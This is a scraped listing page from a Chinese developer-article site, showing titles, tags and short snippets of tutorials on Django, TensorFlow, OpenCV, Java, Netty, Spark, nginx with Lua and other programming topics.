                           title="Django学习笔记" target="_blank">Django学习笔记</a>
                        <span class="text-muted">mengmwng</span>
<a class="tag" taget="_blank" href="/search/Django/1.htm">Django</a><a class="tag" taget="_blank" href="/search/django/1.htm">django</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>学习视频来源：最新Python的web开发全家桶代码仓库：https://gitee.com/m_engmeng/django-learning1.创建项目Django中项目会有一些默认的文件和文件夹1.1在终端打开终端进入某个目录(项目放在哪里)输入命令——创建项目(最后一个参数是项目名)django-adminstartprojectmysite继续输入——创建app（最后一个参数是app所处</div>
                    </li>
                    <li><a href="/article/1882879138520428544.htm"
                           title="python3+TensorFlow 2.x 基础学习（一）" target="_blank">python3+TensorFlow 2.x 基础学习（一）</a>
                        <span class="text-muted">刀客123</span>
<a class="tag" taget="_blank" href="/search/python%E5%AD%A6%E4%B9%A0/1.htm">python学习</a><a class="tag" taget="_blank" href="/search/tensorflow/1.htm">tensorflow</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>目录TensorFlow2.x基础1、安装TensorFlow2.x2、TensorFlow2.x基础概念2、1EagerExecution2、2TensorFlow张量（Tensor）3、使用Keras构建神经网络模型3、1构建Sequential模型3、2编译模型1、Optimizer（优化器）2、Loss（损失函数）3、Metrics（评估指标）3、3训练模型3、4评估模型3、5预测4、使用</div>
                    </li>
                    <li><a href="/article/1882876487770632192.htm"
                           title="微积分公式大全" target="_blank">微积分公式大全</a>
                        <span class="text-muted">.NET跨平台</span>
<a class="tag" taget="_blank" href="/search/%E4%B9%A6%E7%B1%8D/1.htm">书籍</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E7%A7%AF%E5%88%86/1.htm">微积分</a>
                        <div>在微积分的进阶学习中，会涉及许多更加复杂和深奥的公式与定理。以下是一些常见的复杂公式和定理，涵盖了多变量微积分、无穷级数、积分变换、极限等方面：1.多变量微积分偏导数和梯度偏导数：∂∂xf(x,y,z)\frac{\partial}{\partialx}f(x,y,z)∂x∂f(x,y,z)是函数f(x,y,z)f(x,y,z)f(x,y,z)对变量xxx的偏导数。梯度（Gradient）：∇f=</div>
                    </li>
                    <li><a href="/article/1882871315824701440.htm"
                           title="自动驾驶系列—自动驾驶MCU架构全方位解析：从单核到多核的选型指南与应用实例" target="_blank">自动驾驶系列—自动驾驶MCU架构全方位解析：从单核到多核的选型指南与应用实例</a>
                        <span class="text-muted">学步_技术</span>
<a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E9%A9%BE%E9%A9%B6/1.htm">自动驾驶</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E9%A9%BE%E9%A9%B6/1.htm">自动驾驶</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E7%89%87%E6%9C%BA/1.htm">单片机</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/MCU/1.htm">MCU</a>
                        <div>欢迎来到我的技术小筑，一个专为技术探索者打造的交流空间。在这里，我们不仅分享代码的智慧，还探讨技术的深度与广度。无论您是资深开发者还是技术新手，这里都有一片属于您的天空。让我们在知识的海洋中一起航行，共同成长，探索技术的无限可能。探索专栏：学步_技术的首页——持续学习，不断进步，让学习成为我们共同的习惯，让总结成为我们前进的动力。技术导航：人工智能：深入探讨人工智能领域核心技术。自动驾驶：分享自动</div>
                    </li>
                    <li><a href="/article/1882868164346310656.htm"
                           title="经典卷积网络算法-VGG16" target="_blank">经典卷积网络算法-VGG16</a>
                        <span class="text-muted">終不似少年遊*</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6/1.htm">人工智能学习进阶</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C/1.htm">神经网络</a><a class="tag" taget="_blank" href="/search/%E5%9B%BE%E5%83%8F%E8%AF%86%E5%88%AB/1.htm">图像识别</a>
                        <div>目录前言TensorFlow2.x中的tf.keras.applications使用示例主要参数迁移学习TensorFlow2.x的优势VGG16前置理解：全连接池化层具体作用与1x1池化的区别使用场景示例与1x1池化的对比总结VGG16的原始结构全局平均池化层在VGG16中的应用1.替代全连接层2.优势修改后的VGG16结构示例修改后的模型结构对比原始VGG16和修改后的模型使用场景总结前言ti</div>
                    </li>
                    <li><a href="/article/1882866270408339456.htm"
                           title="python学opencv|读取图像（四十四）原理探究：bitwise_and()函数实现图像按位与运算" target="_blank">python学opencv|读取图像（四十四）原理探究：bitwise_and()函数实现图像按位与运算</a>
                        <span class="text-muted">西猫雷婶</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/opencv/1.htm">opencv</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%A7%86%E8%A7%89/1.htm">计算机视觉</a>
                        <div>【1】引言前序学习进程中，已经掌握了两张图片按位与操作的基本技巧：python学opencv|读取图像（四十三）使用cv2.bitwise_and()函数实现图像按位与运算-CSDN博客【2】cv2.bitwise_and()函数实现图像按位与运算原理【2.1】图像运算在前述学习过程中，我们只是使用了cv2.bitwise_and()函数，其实未曾深入探究其根本原理。为实现原理探索，直接使用彩色图</div>
                    </li>
                    <li><a href="/article/1882857948166811648.htm"
                           title="2025数学建模美赛——神经网络预测模型详解" target="_blank">2025数学建模美赛——神经网络预测模型详解</a>
                        <span class="text-muted">前程算法屋</span>
<a class="tag" taget="_blank" href="/search/%E6%95%B0%E5%AD%A6%E5%BB%BA%E6%A8%A1%E6%95%99%E7%A8%8B/1.htm">数学建模教程</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E5%AD%A6%E5%BB%BA%E6%A8%A1/1.htm">数学建模</a><a class="tag" taget="_blank" href="/search/%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C/1.htm">神经网络</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>2025数学建模美赛——神经网络预测模型详解一、神经网络预测模型基础1.1、神经网络概述神经网络是一种模拟人脑神经元工作方式的计算模型，它由大量的节点（或称为神经元）组成，这些节点通过连接权重相互连接。这种模型能够进行复杂的非线性数据处理，通过调整连接权重，可以从数据中学习到复杂的模式和关系。神经网络的基本结构包括输入层、隐藏层和输出层。输入层接收外部数据，隐藏层对数据进行处理，输出层则给出模型的</div>
                    </li>
                    <li><a href="/article/1882857569349857280.htm"
                           title="【python学习】一篇带你玩转 Python JSON 操作的终极指南：dump、dumps、load、loads 全解析" target="_blank">【python学习】一篇带你玩转 Python JSON 操作的终极指南：dump、dumps、load、loads 全解析</a>
                        <span class="text-muted">NLP仙人</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/json/1.htm">json</a>
                        <div>在现代编程中，JSON(JavaScriptObjectNotation)是一种广泛使用的数据交换格式。在Python中，处理JSON数据是一项常见的任务，Python提供了强大的json模块来轻松地进行JSON编码和解码。本文将详细介绍json.dump、json.dumps、json.load和json.loads四个函数的用法，并通过代码示例帮助你掌握这些工具。json.dump和json.</div>
                    </li>
                    <li><a href="/article/1882857570029334528.htm"
                           title="【含文档+PPT+源码】基于小程序的智能停车管理系统设计与开发" target="_blank">【含文档+PPT+源码】基于小程序的智能停车管理系统设计与开发</a>
                        <span class="text-muted">小咕聊编程</span>
<a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a>
                        <div>项目介绍本课程演示的是一款基于小程序的智能停车管理系统设计与开发，主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的Java学习者。1.包含：项目源码、项目文档、数据库脚本、软件工具等所有资料2.带你从零开始部署运行本套系统3.该项目附带的源码资料可作为毕设使用智能停车管理系统的重要核心功能包括管理注册用户、管理停车场公告、车辆信息管理、车位信息管理、车辆入库、车辆出库、数据统计、查找附</div>
                    </li>
                    <li><a href="/article/1882854039788515328.htm"
                           title="Linux Vim最全面的教程" target="_blank">Linux Vim最全面的教程</a>
                        <span class="text-muted">109702008</span>
<a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a><a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/linux%E7%B3%BB%E7%BB%9F/1.htm">linux系统</a><a class="tag" taget="_blank" href="/search/vim/1.htm">vim</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>GPT-4o(OpenAI)学习和掌握Vim可能需要一些时间和耐心，但一旦精通，它将成为一个非常强大的文本编辑工具。以下是一个涵盖Vim各个方面的全面教程：1.基础概念-启动和退出：-启动Vim：vimfilename-普通模式下退出：`:q`（无修改）或:q!（放弃修改）-保存并退出：`:wq`或:x-只保存：`:w`-模式：-普通模式（Normalmode）-插入模式（Insertmode）：</div>
                    </li>
                    <li><a href="/article/1882851643637166080.htm"
                           title="25.1.24学习内容" target="_blank">25.1.24学习内容</a>
                        <span class="text-muted">The_cute_cat</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/1.htm">数据结构</a>
                        <div>A-美国血统AmericanHeritageDescription农夫约翰非常认真地对待他的奶牛们的血统。然而他不是一个真正优秀的记帐员。他把他的奶牛们的家谱作成二叉树，并且把二叉树以更线性的“树的中序遍历”和“树的前序遍历”的符号加以记录而不是用图形的方法。你的任务是在被给予奶牛家谱的“树中序遍历”和“树前序遍历”的符号后，创建奶牛家谱的“树的后序遍历”的符号。每一头奶牛的姓名被译为一个唯一的字</div>
                    </li>
                    <li><a href="/article/1882849501660639232.htm"
                           title="[Python从零到壹] 七十七.图像识别及经典案例篇之目标检测入门普及和ImageAI对象检测详解" target="_blank">[Python从零到壹] 七十七.图像识别及经典案例篇之目标检测入门普及和ImageAI对象检测详解</a>
                        <span class="text-muted">Eastmount</span>
<a class="tag" taget="_blank" href="/search/Python%E4%BB%8E%E9%9B%B6%E5%88%B0%E5%A3%B9/1.htm">Python从零到壹</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E7%9B%AE%E6%A0%87%E6%A3%80%E6%B5%8B/1.htm">目标检测</a><a class="tag" taget="_blank" href="/search/ImageAI/1.htm">ImageAI</a><a class="tag" taget="_blank" href="/search/%E5%9B%BE%E5%83%8F%E6%98%AF%E8%A2%AB/1.htm">图像是被</a><a class="tag" taget="_blank" href="/search/%E5%9F%BA%E7%A1%80%E7%B3%BB%E5%88%97/1.htm">基础系列</a>
                        <div>欢迎大家来到“Python从零到壹”，在这里我将分享约200篇Python系列文章，带大家一起去学习和玩耍，看看Python这个有趣的世界。所有文章都将结合案例、代码和作者的经验讲解，真心想把自己近十年的编程经验分享给大家，希望对您有所帮助，文章中不足之处也请海涵。Python系列整体框架包括基础语法10篇、网络爬虫30篇、可视化分析10篇、机器学习20篇、大数据分析20篇、图像识别30篇、人工智</div>
                    </li>
                    <li><a href="/article/1882845468724097024.htm"
                           title="2024 年度学习总结" target="_blank">2024 年度学习总结</a>
                        <span class="text-muted">Sunrise_angel</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a>
                        <div>目录1.前言2.csdn对于我的意义3.写博客的初衷3.1现在的想法4.写博客的意义5.关于生活和博客创作5.1写博客较于纸质笔记的优势6.致20251.前言不知不觉,来到csdn已经快一年了,在这一年中,我通过csdn学习到了很多知识,结识了很多的良师益友.最重要的是,在技术上,我有了质的飞跃.2.csdn对于我的意义csdn,对我来说不仅是一个学习平台,更记录了我在2024的成长历程,可以说,</div>
                    </li>
                    <li><a href="/article/1882829828676186112.htm"
                           title="MyBatis-Plus 学习笔记-条件构造器（不想写sql）" target="_blank">MyBatis-Plus 学习笔记-条件构造器（不想写sql）</a>
                        <span class="text-muted">咕德猫宁丶</span>
<a class="tag" taget="_blank" href="/search/Mybatis-plus%E5%AD%A6%E4%B9%A0/1.htm">Mybatis-plus学习</a><a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a>
                        <div>MyBatis-Plus提供了一套强大的条件构造器（Wrapper），用于构建复杂的数据库查询条件。Wrapper类允许开发者以链式调用的方式构造查询条件，无需编写繁琐的SQL语句，从而提高开发效率并减少SQL注入的风险。在MyBatis-Plus中，Wrapper类是构建查询和更新条件的核心工具。以下是主要的Wrapper类及其功能：AbstractWrapper：这是一个抽象基类，提供了所有W</div>
                    </li>
                    <li><a href="/article/1882827181130838016.htm"
                           title="Abaqus中批量对节点施加集中力荷载" target="_blank">Abaqus中批量对节点施加集中力荷载</a>
                        <span class="text-muted">有限元术仿真</span>
<a class="tag" taget="_blank" href="/search/Abaqus%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91/1.htm">Abaqus二次开发</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                        <div>笔者为科研界最后的摆烂王，目前利用python代码对Abaqus进行二次开发尚在学习中。欢迎各位摆烂的仁人志士们和我一起摆烂！ps：搞什么科研，如果不是被逼无奈，谁要搞科研！先前撰写了一篇关于Abaqus批量施加荷载（位移）的文章，但是很多哥哥们私信小弟的问题，大都是需要施加集中力或者其他节点力。所以昨天也是抽空写了一下，关于Abaqus批量施加集中力荷载在任一节点上的python脚本。在这段过程</div>
                    </li>
                    <li><a href="/article/1882816976296931328.htm"
                           title="C++深入学习string类成员函数（4）：字符串的操作" target="_blank">C++深入学习string类成员函数（4）：字符串的操作</a>
                        <span class="text-muted">舞武零落</span>
<a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>引言在c++中，std::string提供了许多字符串操作符函数，让我们能够秦松驾驭文本数据，而与此同时，非成员函数的重载更是为string类增添了别样的魅力，输入输出流的重载让我们像处理基本类型的数据一样方便地读取和输出字符串，连接操作符的重载使得字符串的拼接变得简洁直观。在这篇博客中，我们将一同深入剖析C++中string类的字符串操作符和非成员函数的重载，为大家在编程之旅中增添一份有力的武器</div>
                    </li>
                    <li><a href="/article/1882814580518875136.htm"
                           title="自动控制原理实验：解锁典型环节时域响应的奥秘" target="_blank">自动控制原理实验：解锁典型环节时域响应的奥秘</a>
                        <span class="text-muted">戒了9</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1/1.htm">课程设计</a>
                        <div>实验背景与目的在自动控制原理的学习旅程中，实验环节犹如一把钥匙，为我们打开了通往深入理解和实际应用的大门。它不仅仅是理论知识的简单验证，更是将抽象概念转化为实际认知的关键桥梁。通过实验，我们能够在实践中探索自动控制的奥秘，将书本上的公式和原理与真实的系统行为联系起来，从而深化对知识的理解，提升解决实际问题的能力。本次实验聚焦于典型环节的时域响应，这是自动控制领域中至关重要的研究内容。典型环节作为构</div>
                    </li>
                                <li><a href="/article/39.htm"
                                       title="java Illegal overloaded getter method with ambiguous type for propert的解决" target="_blank">java Illegal overloaded getter method with ambiguous type for propert的解决</a>
                                    <span class="text-muted">zwllxs</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/jdk/1.htm">jdk</a>
                                    <div>好久不来iteye,今天又来看看，哈哈,今天碰到在编码时，反射中会抛出 
 Illegal overloaded getter method with ambiguous type for propert这么个东东，从字面意思看，是反射在获取getter时迷惑了，然后回想起java在boolean值在生成getter时，分别有is和getter，也许我们的反射对象中就有is开头的方法迷惑了jdk，</div>
                                </li>
                                <li><a href="/article/166.htm"
                                       title="IT人应当知道的10个行业小内幕" target="_blank">IT人应当知道的10个行业小内幕</a>
                                    <span class="text-muted">beijingjava</span>
<a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E4%BA%92%E8%81%94%E7%BD%91/1.htm">互联网</a>
                                    <div>10. 虽然IT业的薪酬比其他很多行业要好，但有公司因此视你为其“佣人”。 
　　尽管IT人士的薪水没有互联网泡沫之前要好，但和其他行业人士比较，IT人的薪资还算好点。在接下的几十年中，科技在商业和社会发展中所占分量会一直增加，所以我们完全有理由相信，IT专业人才的需求量也不会减少。 
　　然而，正因为IT人士的薪水普遍较高，所以有些公司认为给了你这么多钱，就把你看成是公司的“佣人”，拥有你的支配</div>
                                </li>
                                <li><a href="/article/293.htm"
                                       title="java 实现自定义链表" target="_blank">java 实现自定义链表</a>
                                    <span class="text-muted">CrazyMizzz</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/1.htm">数据结构</a>
                                    <div>1.链表结构 
 
  链表是链式的结构 
 
 
2.链表的组成 
 
   链表是由头节点，中间节点和尾节点组成 
 
   节点是由两个部分组成： 
 
      1.数据域 
      2.引用域 
 
 
3.链表的实现 
 
&nbs</div>
                                </li>
                                <li><a href="/article/420.htm"
                                       title="web项目发布到服务器后图片过一会儿消失" target="_blank">web项目发布到服务器后图片过一会儿消失</a>
                                    <span class="text-muted">麦田的设计者</span>
<a class="tag" taget="_blank" href="/search/struts2/1.htm">struts2</a><a class="tag" taget="_blank" href="/search/%E4%B8%8A%E4%BC%A0%E5%9B%BE%E7%89%87/1.htm">上传图片</a><a class="tag" taget="_blank" href="/search/%E6%B0%B8%E4%B9%85%E4%BF%9D%E5%AD%98/1.htm">永久保存</a>
                                    <div>  作为一名学习了android和j2ee的程序员，我们必须要意识到，客服端和服务器端的交互是很有必要的，比如你用eclipse写了一个web工程，并且发布到了服务器（tomcat）上，这时你在webapps目录下看到了你发布的web工程，你可以打开电脑的浏览器输入http://localhost:8080/工程/路径访问里面的资源。但是，有时你会突然的发现之前用struts2上传的图片</div>
                                </li>
                                <li><a href="/article/547.htm"
                                       title="CodeIgniter框架Cart类 name 不能设置中文的解决方法" target="_blank">CodeIgniter框架Cart类 name 不能设置中文的解决方法</a>
                                    <span class="text-muted">IT独行者</span>
<a class="tag" taget="_blank" href="/search/CodeIgniter/1.htm">CodeIgniter</a><a class="tag" taget="_blank" href="/search/Cart/1.htm">Cart</a><a class="tag" taget="_blank" href="/search/%E6%A1%86%E6%9E%B6%E3%80%80/1.htm">框架　</a>
                                    <div>今天试用了一下CodeIgniter的Cart类时遇到了个小问题，发现当name的值为中文时，就写入不了session。在这里特别提醒一下。 在CI手册里也有说明，如下： 
$data = array(
               'id'      => 'sku_123ABC',
               'qty'     => 1,
               '</div>
                                </li>
                                <li><a href="/article/674.htm"
                                       title="linux回收站" target="_blank">linux回收站</a>
                                    <span class="text-muted">_wy_</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E5%9B%9E%E6%94%B6%E7%AB%99/1.htm">回收站</a>
                                    <div>今天一不小心在ubuntu下把一个文件移动到了回收站，我并不想删，手误了。我急忙到Nautilus下的回收站中准备恢复它，但是里面居然什么都没有。      后来我发现这是由于我删文件的地方不在HOME所在的分区，而是在另一个独立的Linux分区下，这是我专门用于开发的分区。而我删除的东东在分区根目录下的.Trash-1000/file目录下，相关的删除信息（删除时间和文件所在</div>
                                </li>
                                <li><a href="/article/801.htm"
                                       title="jquery回到页面顶端" target="_blank">jquery回到页面顶端</a>
                                    <span class="text-muted">知了ing</span>
<a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/css/1.htm">css</a>
                                    <div>html代码： 
 
<h1 id="anchor">页面标题</h1>
<div id="container">页面内容</div>
<p><a href="#anchor" class="topLink">回到顶端</a><</div>
                                </li>
                                <li><a href="/article/928.htm"
                                       title="B树、B-树、B+树、B*树" target="_blank">B树、B-树、B+树、B*树</a>
                                    <span class="text-muted">矮蛋蛋</span>
<a class="tag" taget="_blank" href="/search/B%E6%A0%91/1.htm">B树</a>
                                    <div>原文地址： 
http://www.cnblogs.com/oldhorse/archive/2009/11/16/1604009.html 
B树 
 
       即二叉搜索树： 
 
       1.所有非叶子结点至多拥有两个儿子（Left和Right）； 
 
&nb</div>
                                </li>
                                <li><a href="/article/1055.htm"
                                       title="数据库连接池" target="_blank">数据库连接池</a>
                                    <span class="text-muted">alafqq</span>
<a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93%E8%BF%9E%E6%8E%A5%E6%B1%A0/1.htm">数据库连接池</a>
                                    <div>http://www.cnblogs.com/xdp-gacl/p/4002804.html 
 
@Anthor:孤傲苍狼 
 
数据库连接池 
 
用MySQLv5版本的数据库驱动没有问题，使用MySQLv6和Oracle的数据库驱动时候报如下错误： 
java.lang.ClassCastException: $Proxy0 cannot be cast to java.sql.Connec</div>
                                </li>
                                <li><a href="/article/1182.htm"
                                       title="java泛型" target="_blank">java泛型</a>
                                    <span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/java%E6%B3%9B%E5%9E%8B/1.htm">java泛型</a>
                                    <div>泛型 
在Java SE 1.5之前，没有泛型的情况的下，通过对类型Object的引用来实现参数的“任意化”，任意化的缺点就是要实行强制转换，这种强制转换可能会带来不安全的隐患 
  
泛型的特点：消除强制转换 确保类型安全 向后兼容 
  
简单泛型的定义： 
     泛型：就是在类中将其模糊化，在创建对象的时候再具体定义 
class fan</div>
                                </li>
                                <li><a href="/article/1309.htm"
                                       title="javascript闭包[两个小测试例子]" target="_blank">javascript闭包[两个小测试例子]</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a>
                                    <div>一.程序一 
<script>
var name = "The Window";
var Object_a = {
　　name : "My Object",
　　getNameFunc : function(){
               var that = this;
　　　　return function(){
　　　　</div>
                                </li>
                                <li><a href="/article/1436.htm"
                                       title="探索JUnit4扩展：假设机制（Assumption）" target="_blank">探索JUnit4扩展：假设机制（Assumption）</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Assumption/1.htm">Assumption</a><a class="tag" taget="_blank" href="/search/JUnit/1.htm">JUnit</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E5%85%83%E6%B5%8B%E8%AF%95/1.htm">单元测试</a>
                                    <div>一.假设机制（Assumption）概述        理想情况下，写测试用例的开发人员可以明确的知道所有导致他们所写的测试用例不通过的地方，但是有的时候，这些导致测试用例不通过的地方并不是很容易的被发现，可能隐藏得很深，从而导致开发人员在写测试用例时很难预测到这些因素，而且往往这些因素并不是开发人员当初设计测试用例时真正目的，</div>
                                </li>
                                <li><a href="/article/1563.htm"
                                       title="【Gson四】范型POJO的反序列化" target="_blank">【Gson四】范型POJO的反序列化</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/POJO/1.htm">POJO</a>
                                    <div>在下面这个例子中，POJO(Data类)是一个范型类，在Tests中，指定范型类为PieceData，POJO初始化完成后，通过 
String str = new Gson().toJson(data); 
得到范型化的POJO序列化得到的JSON串，然后将这个JSON串反序列化为POJO 
  
import com.google.gson.Gson;

import java.</div>
                                </li>
                                <li><a href="/article/1690.htm"
                                       title="【Spark八十五】Spark Streaming分析结果落地到MySQL" target="_blank">【Spark八十五】Spark Streaming分析结果落地到MySQL</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/Stream/1.htm">Stream</a>
                                    <div>几点总结： 
1. DStream.foreachRDD是一个Output Operation，类似于RDD的action，会触发Job的提交。DStream.foreachRDD是数据落地很常用的方法 
2. 获取MySQL Connection的操作应该放在foreachRDD的参数（是一个RDD[T]=>Unit的函数类型)，这样，当foreachRDD方法在每个Worker上执行时，</div>
                                </li>
                                <li><a href="/article/1817.htm"
                                       title="NGINX + LUA实现复杂的控制" target="_blank">NGINX + LUA实现复杂的控制</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/nginx+lua/1.htm">nginx lua</a>
                                    <div>安装lua_nginx_module 模块 
lua_nginx_module 可以一步步的安装，也可以直接用淘宝的OpenResty 
Centos和debian的安装就简单了。。 
这里说下freebsd的安装： 
fetch http://www.lua.org/ftp/lua-5.1.4.tar.gz
tar zxvf lua-5.1.4.tar.gz
cd lua-5.1.4
ma</div>
                                </li>
                                <li><a href="/article/1944.htm"
                                       title="java-递归判断数组是否升序" target="_blank">java-递归判断数组是否升序</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>

public class IsAccendListRecursive {

	/*递归判断数组是否升序
	 * if a Integer array is ascending,return true
	 * use recursion
	 */
	
	public static void main(String[] args){
		IsAccendListRecursiv</div>
                                </li>
                                <li><a href="/article/2071.htm"
                                       title="Netty源码学习-DefaultChannelPipeline2" target="_blank">Netty源码学习-DefaultChannelPipeline2</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/netty/1.htm">netty</a>
                                    <div>Netty3的API 
 
http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/ChannelPipeline.html 
里面提到ChannelPipeline的一个“pitfall”： 
如果ChannelPipeline只有一个handler（假设为handlerA）且希望用另一handler（假设为handlerB） 
来</div>
                                </li>
                                <li><a href="/article/2198.htm"
                                       title="Java工具之JPS" target="_blank">Java工具之JPS</a>
                                    <span class="text-muted">chinrui</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>JPS使用 
  
  
熟悉Linux的朋友们都知道，Linux下有一个常用的命令叫做ps（Process Status)，是用来查看Linux环境下进程信息的。同样的，在Java Virtual Machine里面也提供了类似的工具供广大Java开发人员使用，它就是jps（Java Process Status)，它可以用来</div>
                                </li>
                                <li><a href="/article/2325.htm"
                                       title="window.print分页打印" target="_blank">window.print分页打印</a>
                                    <span class="text-muted">ctrain</span>
<a class="tag" taget="_blank" href="/search/window/1.htm">window</a>
                                    <div>
function init() {
    var tt = document.getElementById("tt");
    var childNodes = tt.childNodes[0].childNodes;
    var level = 0;
    for (var i = 0; i < childNodes.length; i++) {
</div>
                                </li>
                                <li><a href="/article/2452.htm"
                                       title="安装hadoop时 执行jps命令Error occurred during initialization of VM" target="_blank">安装hadoop时 执行jps命令Error occurred during initialization of VM</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/jdk/1.htm">jdk</a><a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a><a class="tag" taget="_blank" href="/search/jps/1.htm">jps</a>
                                    <div>在安装hadoop时，执行JPS出现下面错误 
  
[slave16]root@192.168.11.10:/tmp/hsperfdata_hdfs# jps 
Error occurred during initialization of VM 
java.lang.Error: Properties init: Could not determine current working</div>
                                </li>
                                <li><a href="/article/2579.htm"
                                       title="PHP开发大型项目的一点经验" target="_blank">PHP开发大型项目的一点经验</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/%E9%87%8D%E6%9E%84/1.htm">重构</a>
                                    <div>一、变量 最好是把所有的变量存储在一个数组中，这样在程序的开发中可以带来很多的方便，特别是当程序很大的时候。变量的命名就当适合自己的习惯，不管是用拼音还是英语，至少应当有一定的意义，以便适合记忆。变量的命名尽量规范化，不要与PHP中的关键字相冲突。 二、函数 PHP自带了很多函数，这给我们程序的编写带来了很多的方便。当然，在大型程序中我们往往自己要定义许多个函数，几十</div>
